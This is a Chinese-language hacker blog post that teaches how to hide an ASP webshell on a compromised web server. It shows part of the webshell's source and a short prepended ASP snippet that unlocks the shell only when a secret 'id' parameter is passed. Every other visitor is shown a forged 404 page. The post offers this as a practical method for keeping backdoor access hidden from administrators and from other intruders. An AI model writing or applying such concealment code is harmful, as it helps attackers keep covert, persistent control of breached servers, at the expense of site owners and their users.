另类隐藏保护asp大马地址 ***

hacker5年前黑客文章771

我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了

或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列 *** 来进行处理。

如何加上密码让他人进不来呢?

有些人直接加个登陆界面,人家一看就知道这是大马,还可以猜密码,我的 *** 就与众不同

首先我们来看看他的一部分源码

<%

'pue=true

On Error Resume Next

server.scripttimeout=600

UserPass="login"

response.buffer = true

Response.Expires = -1

Session.Timeout=60

Const wwj="NET WORK SYSTEM"

Const jlt="WEB TESTER'S SYSTEM"

Const oqk="zxp|cyk|dez|bki|ooc|che|koc|zbk|cxa|slf|ysi|azp|bdv|tempfile|zlc|miv|gez|kmt|sqdb|kbsl|newf"

Const pnf=true

Const rfd=33

Const yqo="d *** fk"

Const kuf="GB2312"

Const gco="_"

Const fgb="want_pre.asp"

Const righthz="_request_send_sumbit_include_reel_open_form_month_data"

public br,pbwell,juppath,foldermax,maxpath

foldermax=0

dim login,gem,jdu,kyj,ttg,cl,ghq,cey,zxp,cqo,iax,udo,cyk,dez,bki,jqj,tio,jki,nyr,glm,xnr,vnm,pue,zoi,ulz,jsr,gtu,qdr,yqc,ooc,bvn,khd,che,koc,zbk,cxa,slf,ysi,irs,sxi,bin,azp,bdv,wld,ovy,nqv,T1,ito,dqc,eaz,bia,uyy,yjd,xur,nld,zlc,miv,gez,kmt,ouc,rxg,amm,xbd,vuj,dov,ysv,mt,znk,boo,opy,moi,ddo,okCPU,iak,clw,bpx,akh,cgh,ouo,etz,uvt,alr,zpq,pfv,tlk,nrp,zni,ypd,nww,rrt,boq,lqo,gsh,eyq,ifp,afc,pgh,cen,lsv,tag,zhx,eza,ydo,tfv,uxo,fbp,mct,znz

jki= Clng("&H0")

for i=0 to 12

cqo=cqo&"#"&right("000000"&trim(hex(jki)),6)&","

jki=jki+1118481

next

colors=cqo&"#FFFFFF,#f44444,#00FF00,#f00000"

cl=split(colors,",")

怎样进行处理呢?

我在前面加上了

 

<%

if request("id")="08sec" then

session("ISUSER00")= "TRUE"

end if

%>

<%

If Session("ISUSER00") = "" Then

response.write("<html><body><h1> HTTP/1.1 404 Not Found</h1></body></html>")

Response.End

end if

%>

这段代码的意思是

如果返回的id是08sec的话就添加一个session isuser00的值为true

如果Session("ISUSER00")的值为空显示HTTP/1.1 404 Not Found

如果不是就执行下面的代码

所以我们的大马就被保护起来了

效果如下:

标签: 黑客技术

相关文章

THCAmap使用方法

THCAmap使用方法

依据关键创作者和开发者的叫法,THC Amap是一个网络黑客和渗入专用工具,是实行程序运行协议书检验的第一个专用工具。可是,一定要注意,假如您对这一迷你型专用工具很感兴趣,那麼您将会最好是应用nma...

黑客攻击常常碰到的几类数据库查询

黑客攻击常常碰到的几类数据库查询

许多 小伙伴们爱看黑客攻击常常碰到的几类数据库查询,今日他来了,大家这儿沒有空话,仅有干货知识,是初学者黑客入门的首选之岛。 1、Oracle数据库查询 默认设置端口...

详解测试IP地址的几个命令

如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

各种网络环境渗透测试简述

一、渗透测试概念 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方...

侧门和木马病毒有什么不同?

侧门和木马病毒有什么不同?

侧门和木马病毒有什么不同? 我觉得严苛实际意义沒有差别的,微小的区别是有的。有一个微小区别先讲一下,这两个词出去早中晚不一样。老一代网络黑客,不屑黑本人设备(那时候本人机网速太慢),觉得网络服务器才...

OpenSSL是完全免费的吗?

OpenSSL是完全免费的吗?

什么叫OpenSSL? 这不是严格意义上来说是一个“黑客工具”,只是一个新项目(称之为“OpenSSL新项目”),致力于将详细的商业服务解决方法融合给网络信息安全专业人员出示安裝安全性套接字层(SS...